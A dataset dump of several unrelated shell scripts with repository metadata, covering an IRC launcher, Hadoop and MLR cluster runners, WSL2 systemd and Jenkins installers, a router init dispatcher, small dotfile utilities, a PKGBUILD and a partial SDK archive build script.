/website_2015-10/a2cloud/setup/a2chat.txt
|
UTF-8
| 1,256
| 3.75
| 4
|
[] |
no_license
|
#!/bin/bash
# Launch irssi preconfigured to join #a2c.chat on irc.a2central.com,
# installing irssi on first use and remembering the chosen nickname in
# ~/.irssi/a2c.nickname.  Pre-existing irssi startup/config files are saved
# first and restored when irssi exits.
if [[ ! $(dpkg -l irssi 2> /dev/null | grep '^ii') ]]; then
echo "Installing irssi..."
# BUG FIX: was "supo apt-get -y update" — a typo for sudo, so the package
# index was never refreshed before installing.
sudo apt-get -y update
sudo apt-get -y install irssi &> /dev/null
sudo apt-get -y clean
fi
# Nickname precedence: "-n <nick>" argument > saved file > prompt.
if [[ $1 == "-n" && $2 ]]; then
nickname=$2
elif [[ $1 == "-n" ]]; then
nickname="0"
elif [[ -f ~/.irssi/a2c.nickname ]]; then
nickname=$(cat ~/.irssi/a2c.nickname)
else
nickname=
fi
# Re-prompt until the nickname matches the IRC nick grammar (letter or
# punctuation first, then letters/digits/punctuation); "-n" with no value
# seeds "0", which fails this check and forces the prompt.
while [[ ! $nickname || ! $(grep -i '^[a-z_\-\\^{}|`][a-z0-9_\-\\^{}|`]*$' <<< $nickname) ]]; do
echo -n "Enter a nickname for chat (to change later, use 'a2chat -n'): "
read
nickname=$REPLY
done
mkdir -p ~/.irssi
echo $nickname > ~/.irssi/a2c.nickname
# Stash any user startup file, install ours (auto-connect + auto-join).
if [[ -f ~/.irssi/startup ]]; then
mv ~/.irssi/startup ~/.irssi/startup.orig
fi
echo -e "/network add -autosendcmd '/join #a2c.chat' Palomino.A2\n/server add -auto -network Palomino.A2 irc.a2central.com\n" > ~/.irssi/startup
if [[ -f ~/.irssi/config ]]; then
cp ~/.irssi/config ~/.irssi/config.orig
fi
irssi -n $nickname
# Restore whatever startup/config the user had before.
rm ~/.irssi/startup &> /dev/null
if [[ -f ~/.irssi/startup.orig ]]; then
mv ~/.irssi/startup.orig ~/.irssi/startup
fi
rm ~/.irssi/config &> /dev/null
if [[ -f ~/.irssi/config.orig ]]; then
mv ~/.irssi/config.orig ~/.irssi/config
fi
| true
|
fbf78532fa26e1f8c4e918ecd82ada914d252c6c
|
Shell
|
hdc1112/misc-program
|
/java/Eclipse-workspace/MR-2Phase-FPGrowth/cluster-scripts/cluster-runscript/cli-version/data.sh
|
UTF-8
| 1,518
| 3.609375
| 4
|
[] |
no_license
|
#!/usr/bin/env bash
# Stage an input dataset for a Hadoop MapReduce job: clears old HDFS output,
# then (unless -n is given) copies the local folder to the worker node and
# loads it into HDFS under /input-test.
# default value stage
folder=    #f  local dataset folder to upload
noupload=  #n  when set, assume /input-test is already populated in HDFS
worknode=ibmvm1 #w  host running the Hadoop namenode
user=dachuan #u  remote account used for ssh/scp
# definition, parsing, interrogation stages
while getopts ":f:w:u:n" o; do
case $o in
f)
folder=$OPTARG
;;
w)
worknode=$OPTARG
;;
u)
user=$OPTARG
;;
n)
noupload=noupload
;;
*)
echo invalid argument >&2
exit 1
;;
esac
done
# arguments show stage
echo `basename $0` arguments list
echo folder=$folder
echo noupload=$noupload
echo worknode=$worknode
echo user=$user
#verify arguments stage (skip)
# standard header
absme=`readlink -f $0`
abshere=`dirname $absme`
# argument path absolutify
folder=`readlink -f $folder`
foldername=`basename $folder`
# enter my work directory
cd $abshere
# main logic
set -x
# Always remove previous job outputs so the MR job can recreate them.
ssh -n $user@$worknode /home/$user/hadoop-2.2.0/bin/hdfs dfs -rm -r -f /output-test-1stphase /output-test
if [ "$noupload" = "noupload" ]; then
echo Data upload is skipped, user assumes the input is ready in HDFS
else
# Stage the data via a per-dataset scratch dir on the worker, then load it
# into a fresh /input-test directory in HDFS.
ssh -n $user@$worknode "rm -rf /tmp/${foldername}dif && mkdir /tmp/${foldername}dif"
echo start uploading data to hdfs && date
scp -r $folder/* $user@$worknode:/tmp/${foldername}dif/
echo data uploaded to hdfs && date
ssh -n $user@$worknode ./hadoop-2.2.0/bin/hdfs dfs -rm -r -f /input-test
ssh -n $user@$worknode ./hadoop-2.2.0/bin/hdfs dfs -mkdir /input-test
ssh -n $user@$worknode ./hadoop-2.2.0/bin/hdfs dfs -copyFromLocal /tmp/${foldername}dif/* /input-test/
fi
set +x
| true
|
801a8349ee83dae6d021604412dbd3831bb59a24
|
Shell
|
jackylk/public
|
/apps/mlr/scripts/run_mlr.sh
|
UTF-8
| 3,372
| 3.0625
| 3
|
[
"BSD-3-Clause"
] |
permissive
|
#!/usr/bin/env bash
# Covtype
train_file="covtype.scale.train.small"
test_file="covtype.scale.test.small"
train_file_path=$(readlink -f datasets/$train_file)
test_file_path=$(readlink -f datasets/$test_file)
global_data=true
perform_test=true
# Init weights
use_weight_file=false
weight_file=
# Data parameters:
num_train_data=0 # 0 to use all training data.
# Execution parameters:
num_epochs=40
num_batches_per_epoch=300
learning_rate=0.01
decay_rate=0.95
num_batches_per_eval=300
num_train_eval=10000 # large number to use all data.
num_test_eval=20
# System parameters:
host_filename="scripts/localserver"
num_app_threads=4
staleness=0
loss_table_staleness=0
num_comm_channels_per_client=1
# Figure out the paths.
script_path=`readlink -f $0`
script_dir=`dirname $script_path`
app_dir=`dirname $script_dir`
progname=mlr_main
prog_path=$app_dir/bin/${progname}
host_file=$(readlink -f $host_filename)
ssh_options="-oStrictHostKeyChecking=no \
-oUserKnownHostsFile=/dev/null \
-oLogLevel=quiet"
# Parse hostfile
host_list=`cat $host_file | awk '{ print $2 }'`
unique_host_list=`cat $host_file | awk '{ print $2 }' | uniq`
num_unique_hosts=`cat $host_file | awk '{ print $2 }' | uniq | wc -l`
output_dir=$app_dir/output
output_dir="${output_dir}/mlr.${train_file}.S${staleness}.E${num_epochs}"
output_dir="${output_dir}.M${num_unique_hosts}"
output_dir="${output_dir}.T${num_app_threads}"
output_file_prefix=$output_dir/mlr_out # prefix for program outputs
rm -rf ${output_dir}
mkdir -p ${output_dir}
output_file_prefix=${output_dir}/mlr_out # Prefix for program output files.
# Kill previous instances of this program
echo "Killing previous instances of '$progname' on servers, please wait..."
for ip in $unique_host_list; do
ssh $ssh_options $ip \
killall -q $progname
done
echo "All done!"
# Spawn program instances
client_id=0
for ip in $unique_host_list; do
echo Running client $client_id on $ip
cmd="GLOG_logtostderr=true \
GLOG_v=-1 \
GLOG_minloglevel=0 \
GLOG_vmodule="" \
$prog_path \
--hostfile=$host_file \
--client_id=${client_id} \
--num_clients=$num_unique_hosts \
--num_app_threads=$num_app_threads \
--staleness=$staleness \
--loss_table_staleness=$loss_table_staleness \
--num_comm_channels_per_client=$num_comm_channels_per_client \
--num_train_data=$num_train_data \
--train_file=$train_file_path \
--global_data=$global_data \
--test_file=$test_file_path \
--num_train_eval=$num_train_eval \
--num_test_eval=$num_test_eval \
--perform_test=$perform_test \
--num_epochs=$num_epochs \
--num_batches_per_epoch=$num_batches_per_epoch \
--learning_rate=$learning_rate \
--decay_rate=$decay_rate \
--num_batches_per_eval=$num_batches_per_eval
--stats_path=${output_dir}/mlr_stats.yaml \
--use_weight_file=$use_weight_file \
--weight_file=$weight_file \
--sparse_weight=false \
--output_file_prefix=$output_file_prefix"
ssh $ssh_options $ip $cmd &
#eval $cmd # Use this to run locally (on one machine).
# Wait a few seconds for the name node (client 0) to set up
if [ $client_id -eq 0 ]; then
echo $cmd # echo the cmd for just the first machine.
echo "Waiting for name node to set up..."
sleep 3
fi
client_id=$(( client_id+1 ))
done
| true
|
2f766b1f1046a97c7b7c1d42a7776694e2c93a19
|
Shell
|
patrick330602/minimal-wsl2-systemd-script
|
/install.sh
|
UTF-8
| 2,260
| 3
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Minimal WSL2 systemd enablement: configures /etc/wsl.conf so systemd boots
# in its own PID namespace, installs helper scripts from diddledan's
# one-script-wsl2-systemd repo, and masks units that cannot work under WSL.

# Must run as root: everything below writes into /etc.
if [ "$EUID" -ne 0 ]
  then echo "Please run as root"
  exit
fi

tmp_dir=$(mktemp -d)
cd $tmp_dir
git clone https://github.com/diddledan/one-script-wsl2-systemd
# Set [boot] command in /etc/wsl.conf: unshare a PID/mount namespace, mount
# binfmt_misc, then exec systemd so it runs as PID 1 inside that namespace.
python3 -c "import configparser; config = configparser.ConfigParser(); config.read('/etc/wsl.conf'); config['boot']['command'] = \"/usr/bin/env -i /usr/bin/unshare --fork --mount-proc --pid -- sh -c 'mount -t binfmt_misc binfmt_misc /proc/sys/fs/binfmt_misc; [ -x /usr/lib/systemd/systemd ] && exec /usr/lib/systemd/systemd --unit=multi-user.target || exec /lib/systemd/systemd'\"; x = open('/etc/wsl.conf', 'w'); config.write(x); x.close();"
# Sudoers rule + login profile hook that enter the systemd namespace on login.
cp one-script-wsl2-systemd/src/sudoers /etc/sudoers.d/wsl2-systemd
cp one-script-wsl2-systemd/src/00-wsl2-systemd.sh /etc/profile.d/00-wsl2-systemd.sh
mkdir -p "/etc/systemd/system/user-runtime-dir@.service.d/"
cp one-script-wsl2-systemd/src/systemd/user-runtime-dir.override "/etc/systemd/system/user-runtime-dir@.service.d/override.conf"
# Socket-activated XWayland bridge units.
cp one-script-wsl2-systemd/src/systemd/wsl2-xwayland.service /etc/systemd/system/wsl2-xwayland.service
cp one-script-wsl2-systemd/src/systemd/wsl2-xwayland.socket /etc/systemd/system/wsl2-xwayland.socket
ln -sf /etc/systemd/system/wsl2-xwayland.socket /etc/systemd/system/sockets.target.wants/
# Mask (symlink to /dev/null) user units that conflict with WSL interop:
# gpg/ssh agents and pulseaudio are provided by the Windows side or unusable.
ln -sf /dev/null /etc/systemd/user/dirmngr.service
ln -sf /dev/null /etc/systemd/user/dirmngr.socket
ln -sf /dev/null /etc/systemd/user/gpg-agent.service
ln -sf /dev/null /etc/systemd/user/gpg-agent.socket
ln -sf /dev/null /etc/systemd/user/gpg-agent-ssh.socket
ln -sf /dev/null /etc/systemd/user/gpg-agent-extra.socket
ln -sf /dev/null /etc/systemd/user/gpg-agent-browser.socket
ln -sf /dev/null /etc/systemd/user/ssh-agent.service
ln -sf /dev/null /etc/systemd/user/pulseaudio.service
ln -sf /dev/null /etc/systemd/user/pulseaudio.socket
# Mask system networking units: WSL manages the network interface itself.
ln -sf /dev/null /etc/systemd/system/ModemManager.service
ln -sf /dev/null /etc/systemd/system/NetworkManager.service
ln -sf /dev/null /etc/systemd/system/NetworkManager-wait-online.service
ln -sf /dev/null /etc/systemd/system/networkd-dispatcher.service
ln -sf /dev/null /etc/systemd/system/systemd-networkd.service
ln -sf /dev/null /etc/systemd/system/systemd-networkd-wait-online.service
ln -sf /dev/null /etc/systemd/system/systemd-resolved.service
rm -rf $tmp_dir
| true
|
0bcd5f8a401825ebdef4bc23f11645c1c200fd68
|
Shell
|
aur-archive/deutex
|
/PKGBUILD
|
UTF-8
| 587
| 2.578125
| 3
|
[] |
no_license
|
# Contributor: rabyte <rabyte.at.pen.dot.tj>
# Arch Linux PKGBUILD for deutex, a WAD file composer for Doom-engine games.

pkgname=deutex
pkgver=4.4.0
pkgrel=4
pkgdesc="A WAD file composer for Doom, Heretic, Hexen and Strife"
arch=('i686')
url="http://www.teaser.fr/~amajorel/deutex/"
license=('custom')
source=(http://www.teaser.fr/~amajorel/$pkgname/$pkgname-$pkgver.tar.gz)
md5sums=('4c4ea0ff9eae76165a3756b756d71a16')

# Build deutex and install it into the package staging dir ($startdir/pkg).
build() {
cd $startdir/src/$pkgname-$pkgver
make CFLAGS="${CFLAGS} -Wall" || return 1
mkdir -p $startdir/pkg/usr/{bin,man/man6}
make PREFIX=$startdir/pkg/usr install
# 'custom' license: the text must be shipped under /usr/share/licenses.
install -m644 -D LICENSE $startdir/pkg/usr/share/licenses/$pkgname/LICENSE
}
| true
|
ab16568190e2d448e575f21eabaeec9f4bd521ba
|
Shell
|
BigNerd95/Grandstream-Firmware-HT802
|
/FirmwareDumps/HT802-1.0.0.24/etc/rc.d/init.d/rcM
|
UTF-8
| 754
| 3.609375
| 4
|
[] |
no_license
|
#!/bin/sh
# rcM — run a whitespace-separated list of numeric service codes, starting the
# init script mapped to each code, then signal completion via scripts_signal.
# Codes: 1=cron  2=telnet  3=syslog restart  4=reload_gs_ata
#        5=apply country profile + reload_gs_ata

# Signal that this script is done, then exit with the given status
# (defaults to 0 when no status is passed).
signal_exit()
{
#send signal that we are done
scripts_signal 0

if [ -n "$1" ]; then
exit $1
else
exit 0
fi
}

# At least one service code is required.
if [ $# -lt 1 ]; then
signal_exit 1
fi

# Collapse repeated spaces so cut(1) sees single-space-separated fields.
CMD="$(echo $*|tr -s ' ')"

# Consume one code per iteration from the front of CMD.
while [ -n "$CMD" ]
do
SCRIPT="$(echo $CMD|cut -d' ' -f1)"
case "$SCRIPT" in
1)
/etc/init.d/cron
;;
2)
/etc/init.d/telnet
;;
3)
/etc/init.d/syslog restart
;;
4)
/etc/init.d/reload_gs_ata
;;
5)
/etc/init.d/apply_country_profile reload
/etc/init.d/reload_gs_ata
;;
esac
# Drop the processed code. When only one code is left, 'cut -f2-' returns the
# string unchanged, so the equality check below terminates the loop.
PREVCMD="$CMD"
CMD="$(echo $CMD|cut -d' ' -f2-)"
if [ "$PREVCMD" = "$CMD" ]; then
break
fi
done
signal_exit 0
| true
|
8e6c73eb3c56be94c6460ff9d49b404798a15801
|
Shell
|
guudwu1986/settings
|
/script/gitconfig.sh
|
UTF-8
| 390
| 3.65625
| 4
|
[] |
no_license
|
#!/bin/bash
# Symlink this directory's 'gitconfig' template to ~/.gitconfig, first moving
# any existing ~/.gitconfig into ./backup (timestamped).
# Must be run from the directory containing 'gitconfig' and 'backup/'.

# Refuse to run without a backup directory so an existing config is never lost.
if [ ! -d "backup" ]
then
	echo 'Backup directory must exist.'
	exit 255
fi

# Timestamp keeps every displaced config distinct.
current_time=$(date +%Y%m%d-%H%M%S)

if [ -f "$HOME/.gitconfig" ]
then
	echo 'Existing file moved to backup directory.'
	# Quoted expansions: robust against spaces in $HOME.
	mv "$HOME/.gitconfig" "backup/gitconfig-$current_time"
fi

if [ -f "gitconfig" ]
then
	ln -s "$PWD/gitconfig" "$HOME/.gitconfig"
else
	echo 'No template file.'
	exit 1
fi

exit 0
| true
|
2de1d33caf0f442c62d81c60a6ba94a2532e949a
|
Shell
|
quiverteam/quiver-runtime
|
/fix_links.sh
|
UTF-8
| 362
| 3.9375
| 4
|
[] |
no_license
|
#!/bin/bash
# Repair broken relative symlinks inside the runtime trees by re-pointing
# each dangling link at the same target under the tree's absolute path.

NAMES="quiver-runtime-i386 quiver-runtime-amd64"

for NAME in $NAMES; do
	[ -d "$NAME" ] || continue

	# Fixed: iterating over $(find ...) word-splits on whitespace; read the
	# paths NUL-delimited instead so file names with spaces survive.
	while IFS= read -r -d '' file; do
		# A dangling symlink: its (relative) target no longer resolves.
		if [ ! -e "$file" ]; then
			old=$(readlink "$file")
			ln -sfn "$PWD/$NAME/$old" "$file"
			echo "Fixed link $file"
		fi
	done < <(find "./$NAME" -type l -print0)
done
| true
|
1ef309fc96f0edb2b7c849b55edf0d037fb89904
|
Shell
|
jack141799/jenkins
|
/docker/bash/backup-to-hosting.sh
|
UTF-8
| 577
| 2.84375
| 3
|
[] |
no_license
|
#!/bin/bash
# Copy the live Nginx/PHP/supervisor configuration and root SSH keys into
# /home/config (a persisted volume) so they survive container rebuilds.
# '\cp' bypasses any cp alias (e.g. 'cp -i'), so copies never prompt.

# Backup Nginx
\cp -fr /etc/php.ini /home/config/php.ini
\cp -fr /etc/nginx/nginx.conf /home/config/nginx/nginx.conf
\cp -fr /etc/nginx/sites-include/* /home/config/nginx/sites-include/
\cp -fr /etc/nginx/sites-enabled/* /home/config/nginx/sites-enabled/

# Backup supervisor
\cp -fr /etc/supervisord.conf /home/config/supervisord.conf

# Backup SSH
# Keys are copied only if present, so a keyless container does not fail here.
if [ -f "/root/.ssh/id_rsa.pub" ]; then
    \cp -fr /root/.ssh/id_rsa.pub /home/config/ssh-key/
fi
if [ -f "/root/.ssh/id_rsa" ]; then
    \cp -fr /root/.ssh/id_rsa /home/config/ssh-key/
fi
echo "Backup Finish"
| true
|
7337078495b90e3eeb7bc8107402730352d83371
|
Shell
|
viplezer/jenkins-install-scripts
|
/install_jenkins-nopretty.sh
|
UTF-8
| 967
| 2.78125
| 3
|
[] |
no_license
|
# Install Jenkins CI with OpenJDK 7, Maven, 32-bit support libraries, and the
# Android SDK (r24.4.1) on a Debian/Ubuntu host.
# The whole script is one '&&' chain, so it stops at the first failing step.
# Note: Android SDK platform packages must still be installed manually
# afterwards (see the final echo).
wget -q -O - https://jenkins-ci.org/debian/jenkins-ci.org.key | sudo apt-key add - && \
sudo sh -c 'echo deb http://pkg.jenkins-ci.org/debian binary/ > /etc/apt/sources.list.d/jenkins.list' && \
sudo apt-get update && \
sudo apt-get -y install openjdk-7-jdk maven libc6-i386 lib32stdc++6 lib32gcc1 lib32ncurses5 lib32z1 jenkins && \
sudo wget http://dl.google.com/android/android-sdk_r24.4.1-linux.tgz -P /opt && \
sudo tar xzvf /opt/android-sdk_r24.4.1-linux.tgz -C /opt && \
sudo rm /opt/android-sdk_r24.4.1-linux.tgz && \
sudo chmod -R +x /opt/android-sdk-linux && \
echo 'export ANDROID_HOME="/opt/android-sdk-linux" export PATH="$ANDROID_HOME/tools:$ANDROID_HOME/platform-tools:$PATH"' | sudo tee /etc/profile.d/android.sh > /dev/null && \
source /etc/profile && \
echo "" && \
echo "Everything is installed, but you have to install Android SDK platforms manually." && \
echo "Use the sudo /opt/android-sdk-linux/tools/android command to start the SDK manager!"
| true
|
47fe2c0274057a80a96b97d3ed0547f366edb8ad
|
Shell
|
behdad/MINGW-packages
|
/mingw-w64-python-nose/PKGBUILD
|
UTF-8
| 2,433
| 2.953125
| 3
|
[
"BSD-3-Clause"
] |
permissive
|
# Maintainer: Alexey Pavlov <alexpux@gmail.com>
_realname=nose
pkgname=("${MINGW_PACKAGE_PREFIX}-python2-${_realname}" "${MINGW_PACKAGE_PREFIX}-python3-${_realname}")
pkgver=1.3.3
pkgrel=1
pkgdesc="A discovery-based unittest extension (mingw-w64)"
arch=('any')
license=('LGPL-2.1')
url="http://readthedocs.org/docs/nose/"
makedepends=("${MINGW_PACKAGE_PREFIX}-python2-setuptools" "${MINGW_PACKAGE_PREFIX}-python3-setuptools")
source=("http://pypi.python.org/packages/source/n/nose/nose-${pkgver}.tar.gz")
md5sums=('42776061bf5206670cb819176dc78654')
build() {
cd "$srcdir/nose-$pkgver"
sed -i -e "s:man/man1:share/man/man1:g" setup.py
cd "$srcdir"
rm -rf python{2,3}-build
for builddir in python{2,3}-build; do
cp -r nose-$pkgver $builddir
pushd $builddir
${MINGW_PREFIX}/bin/${builddir%-build} setup.py build
popd
done
}
package_python3-nose() {
depends=("${MINGW_PACKAGE_PREFIX}-python3-setuptools")
pushd ${MINGW_PREFIX} > /dev/null
local _mingw_prefix=`pwd -W`
popd > /dev/null
cd "$srcdir/python3-build"
MSYS2_ARG_CONV_EXCL="--prefix=;--install-scripts=;--install-platlib=" \
${MINGW_PREFIX}/bin/python3 setup.py install --prefix=${MINGW_PREFIX} --root="$pkgdir" -O1
rm -f ${pkgdir}${MINGW_PREFIX}/bin/nosetests{.exe,-script.py,.exe.manifest}
# fix python command in files
for _f in "${pkgdir}${MINGW_PREFIX}"/bin/*.py; do
sed -e "s|${_mingw_prefix}|${MINGW_PREFIX}|g" -i ${_f}
done
rm -rf "${pkgdir}${MINGW_PREFIX}/share"
}
package_python2-nose() {
depends=("${MINGW_PACKAGE_PREFIX}-python2-setuptools")
pushd ${MINGW_PREFIX} > /dev/null
local _mingw_prefix=`pwd -W`
popd > /dev/null
cd "$srcdir/python2-build"
MSYS2_ARG_CONV_EXCL="--prefix=;--install-scripts=;--install-platlib=" \
${MINGW_PREFIX}/bin/python2 setup.py install --prefix=${MINGW_PREFIX} --root="$pkgdir" -O1
# fix python command in files
for _f in "${pkgdir}${MINGW_PREFIX}"/bin/*.py; do
sed -e "s|${_mingw_prefix}|${MINGW_PREFIX}|g" -i ${_f}
done
}
package_mingw-w64-i686-python2-nose() {
install=${_realname}2-${CARCH}.install
package_python2-nose
}
package_mingw-w64-i686-python3-nose() {
install=${_realname}3-${CARCH}.install
package_python3-nose
}
package_mingw-w64-x86_64-python2-nose() {
install=${_realname}2-${CARCH}.install
package_python2-nose
}
package_mingw-w64-x86_64-python3-nose() {
install=${_realname}3-${CARCH}.install
package_python3-nose
}
| true
|
a417208666120b51560276dadcbd311cf3d817ba
|
Shell
|
unik-name/unn-core
|
/docker/uns-init.sh
|
UTF-8
| 3,589
| 3.75
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/sh
# Container entrypoint for a UNS (uns.network) core node.
# Publishes the network configuration, maps legacy DB_* variables to CORE_DB_*,
# patches the generated .env from exported environment variables, optionally
# registers a boot node as a peer, installs forger secrets, then starts either
# a relay-only node or a full (relay + forger) node.

NETWORK=${UNS_NET:-livenet} # default livenet
TOKEN="uns"

echo "network : $NETWORK"
echo "token : $TOKEN"

# Fixed: '==' inside [ ] is a bashism and errors under POSIX /bin/sh; use '='.
if [ "$NETWORK" = "livenet" ]; then
    unlink /opt/uns/packages/core/bin/config/livenet/sandbox-plugins.js
    cp /opt/uns/packages/core/bin/config/sandbox/plugins.js /opt/uns/packages/core/bin/config/livenet/sandbox-plugins.js
fi

CONFIG_DIR=~/.config/uns-core/$NETWORK

# publish default config (from sources) to $CONFIG_DIR
uns config:publish --network=$NETWORK --token $TOKEN

# Backward compatibility (remove later): map legacy DB_* names to CORE_DB_*.
if [ -n "$DB_HOST" ]; then
    export CORE_DB_HOST=$DB_HOST
    echo "warning: 'DB_HOST' environment variable will be deprecated soon. Use 'CORE_DB_HOST' instead."
fi
if [ -n "$DB_PORT" ]; then
    export CORE_DB_PORT=$DB_PORT
    echo "warning: 'DB_PORT' environment variable will be deprecated soon. Use 'CORE_DB_PORT' instead."
fi
if [ -n "$DB_USER" ]; then
    export CORE_DB_USER=$DB_USER
    echo "warning: 'DB_USER' environment variable will be deprecated soon. Use 'CORE_DB_USER' instead."
fi
if [ -n "$DB_PASSWORD" ]; then
    export CORE_DB_PASSWORD=$DB_PASSWORD
    echo "warning: 'DB_PASSWORD' environment variable will be deprecated soon. Use 'CORE_DB_PASSWORD' instead."
fi
if [ -n "$DB_DATABASE" ]; then
    export CORE_DB_DATABASE=$DB_DATABASE
    echo "warning: 'DB_DATABASE' environment variable will be deprecated soon. Use 'CORE_DB_DATABASE' instead."
fi

# Parse the file given as $1 and, for every KEY=VALUE line whose KEY is also an
# exported environment variable, replace the file's value with the exported one.
seek_and_replace(){
    while IFS= read -r line; do # Read each file line
        if [ ! ${#line} -eq "0" ]; then # Skip empty lines
            KEY=$(echo $line | sed 's/^\(.*\)=.*$/\1/') # Environment variable key to seek
            ENV_LINE=$(env | grep ^$KEY=) # Seek that key among exported variables
            # Fixed: the test was '[ ! -z $ENV_LINE ]' — unquoted, it breaks
            # (too many arguments) as soon as the value contains a space.
            if [ -n "$ENV_LINE" ]; then
                VALUE=$(echo $ENV_LINE | sed 's/^'$KEY'=\(.*\)$/\1/') # Exported value
                sed -i "s/^\($KEY=\).*$/\1$VALUE/g" $1 # Rewrite the file entry
                echo "Found external variable $KEY. Replace in config file to value '$VALUE'"
            fi
        fi
    done < $1
}

seek_and_replace $CONFIG_DIR/.env

echo "using P2P port: $CORE_P2P_PORT"

if [ -n "${BOOTSTRAP}" ]; then
    echo "bootstrap mode"
    NETWORK_START="--networkStart"
fi

if [ -n "${BOOTNODE}" ]; then
    echo "uses bootnode : ${BOOTNODE}"
    IP=$(getent hosts $BOOTNODE | cut -d ' ' -f 1)
    if [ -n "${IP}" ]; then
        PEER_FILE=$CONFIG_DIR/peers.json
        # Fixed: "port" was the literal string "$port" inside the single-quoted
        # jq program; bind it as a jq variable (like $ip) so the real port is
        # written into peers.json.
        echo $(jq --arg ip $IP --arg port $CORE_P2P_PORT '.list += [{"ip": $ip,"port": $port}]' $PEER_FILE ) > $PEER_FILE
    fi
    echo "wait bootnode to be up and forging ($STARTING_DELAY)"
    sleep $STARTING_DELAY
fi

FORGER=false # No forger by default
if [ -n "${FORGERS_SECRET}" ]; then
    # Fixed: the message quoted the variable name with backticks inside double
    # quotes, which is command substitution — the shell tried to EXECUTE
    # 'FORGERS_SECRET' as a command.
    echo "setting forgers secret from 'FORGERS_SECRET' environment variable (MULTI FORGERS MODE)"
    echo "{\"secrets\": [$FORGERS_SECRET]}" > $CONFIG_DIR/delegates.json
    FORGER=true
elif [ -n "${FORGER_SECRET}" ]; then
    # Same backtick fix as above (plus the missing space before 'environment').
    echo "setting forger secret from 'FORGER_SECRET' environment variable (SINGLE FORGER MODE)"
    uns config:forger:bip39 --bip39 "$FORGER_SECRET" --token $TOKEN
    FORGER=true
else
    echo "No forger configured. Only relay node will be started."
fi

# Run
if [ "$FORGER" = true ] ; then
    echo "Starting full node (relay + forger)"
    uns core:run --network=$NETWORK $NETWORK_START --token $TOKEN
else
    echo "Starting relay node"
    uns relay:run --network=$NETWORK $NETWORK_START --token $TOKEN
fi
| true
|
50c7c3abaa59d8ace68419ce2bdf964db7c4a32b
|
Shell
|
TessHuelskamp/.myconf
|
/bin/copyloop
|
UTF-8
| 1,001
| 4.15625
| 4
|
[] |
no_license
|
#!/bin/bash
# Place each line of a file into the macOS paste buffer, one line at a time:
# shows the current line, waits for Enter, then loads the next one.
# macOS only (uses pbcopy).

# grab file name from command line args
# not dealing with opts or pipes for now...
if [[ -z "$1" ]]; then
    echo Usage: $0 FILENAME >&2
    exit 1
else
    filename="$1"
fi

if [[ ! -f "$filename" ]]; then
    echo $filename isnt a file. >&2
    # Fixed: bare 'exit' here returned status 0 even though this is an error.
    exit 1
fi

# The 'read -u 3' / '3<' pairing keeps fd 0 (stdin) free for the interactive
# "press Enter" read below; otherwise the file would clobber that second read.
while read -u 3 -r line; do
    # printf preserves the line exactly; 'echo $line' (unquoted) collapsed
    # whitespace and could misinterpret lines beginning with '-'.
    printf '%s' "$line" | pbcopy
    printf '%s' "$line"
    # wait for user to hit enter button
    read -r _
done 3<"$filename"
| true
|
7b392340d6bd3824451228f1f29662e547bf9b00
|
Shell
|
ggerade/_OLD_FleksySDK-compiled
|
/Scripts/buildReleaseArchive.sh
|
UTF-8
| 4,784
| 3.828125
| 4
|
[] |
no_license
|
#!/bin/sh
# If any command fails, cause the script to fail and exit with non-zero status.
set -e
# If any variable is used but unset, cause the script to fail and exit with non-zero status.
set -u
errorHandler () {
errorCode=$?
echo "$0:${BASH_LINENO[0]} error: Command failed: '$BASH_COMMAND'"
exit $errorCode
}
trap errorHandler ERR
function canonpath ()
{
echo $(cd $(dirname "$1"); pwd -P)/$(basename "$1")
}
FLEKSYSDK_COMPILED_SCRIPT_PATH=`canonpath $0`
FLEKSYSDK_COMPILED_SCRIPT_NAME=$(basename "${FLEKSYSDK_COMPILED_SCRIPT_PATH}")
if [[ ! "${FLEKSYSDK_COMPILED_SCRIPT_PATH}" =~ \/Scripts\/${FLEKSYSDK_COMPILED_SCRIPT_NAME} ]]; then
echo "Expected the scripts executable path to end in 'Scripts/${FLEKSYSDK_COMPILED_SCRIPT_NAME}'."
exit 1
fi
FLEKSYSDK_COMPILED_ROOT_DIR="${FLEKSYSDK_COMPILED_SCRIPT_PATH/\/Scripts\/${FLEKSYSDK_COMPILED_SCRIPT_NAME}//}"
FLEKSYSDK_COMPILED_SCRIPTS_DIR="${FLEKSYSDK_COMPILED_ROOT_DIR}/Scripts"
cd "${FLEKSYSDK_COMPILED_ROOT_DIR}"
echo "Building FleksySDK archive..."
FLEKSYSDK_COMPILED_BUILD_DIR="${FLEKSYSDK_COMPILED_ROOT_DIR}/build"
FLEKSYSDK_COMPILED_STAGE_DIR="${FLEKSYSDK_COMPILED_BUILD_DIR}/stage"
rm -rf "${FLEKSYSDK_COMPILED_BUILD_DIR}"
rm -rf "${FLEKSYSDK_COMPILED_STAGE_DIR}"
mkdir -p "${FLEKSYSDK_COMPILED_BUILD_DIR}"
mkdir -p "${FLEKSYSDK_COMPILED_STAGE_DIR}"
echo ""
echo "Staging Android..."
rsync -a --include='lib*.so' --exclude-from="${FLEKSYSDK_COMPILED_SCRIPTS_DIR}/rsyncIgnore" --delete "${FLEKSYSDK_COMPILED_ROOT_DIR}/Android/" "${FLEKSYSDK_COMPILED_STAGE_DIR}/Android/"
mv "${FLEKSYSDK_COMPILED_STAGE_DIR}/Android/lib" "${FLEKSYSDK_COMPILED_STAGE_DIR}/Android/lib_STAGING"
mv "${FLEKSYSDK_COMPILED_STAGE_DIR}/Android/lib_STAGING/Release" "${FLEKSYSDK_COMPILED_STAGE_DIR}/Android/lib"
rsync -a --exclude-from="${FLEKSYSDK_COMPILED_SCRIPTS_DIR}/rsyncIgnore" --exclude='Release' --exclude='Debug' "${FLEKSYSDK_COMPILED_STAGE_DIR}/Android/lib_STAGING/" "${FLEKSYSDK_COMPILED_STAGE_DIR}/Android/lib/"
rm -rf "${FLEKSYSDK_COMPILED_STAGE_DIR}/Android/lib_STAGING"
echo ""
echo "Staging iOS..."
rsync -a --include='lib*.a' --exclude-from="${FLEKSYSDK_COMPILED_SCRIPTS_DIR}/rsyncIgnore" --delete "${FLEKSYSDK_COMPILED_ROOT_DIR}/ios/" "${FLEKSYSDK_COMPILED_STAGE_DIR}/ios/"
mv "${FLEKSYSDK_COMPILED_STAGE_DIR}/ios/lib" "${FLEKSYSDK_COMPILED_STAGE_DIR}/ios/lib_STAGING"
mv "${FLEKSYSDK_COMPILED_STAGE_DIR}/ios/lib_STAGING/Release" "${FLEKSYSDK_COMPILED_STAGE_DIR}/ios/lib"
